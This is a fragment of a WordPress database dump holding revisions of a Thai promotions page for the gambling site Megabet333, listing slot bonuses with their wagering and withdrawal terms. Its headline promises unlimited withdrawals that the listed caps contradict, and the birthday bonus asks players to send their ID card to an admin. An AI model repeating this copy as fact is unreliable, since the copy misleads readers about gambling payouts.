data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 12:46:01','2025-10-23 12:46:01','',27,'https://megabet333.biz/?p=153',0,'revision','',0),(154,3,'2025-10-23 12:46:02','2025-10-23 12:46:02','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 12:46:02','2025-10-23 12:46:02','',27,'https://megabet333.biz/?p=154',0,'revision','',0),(155,3,'2025-10-23 12:46:02','2025-10-23 12:46:02','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 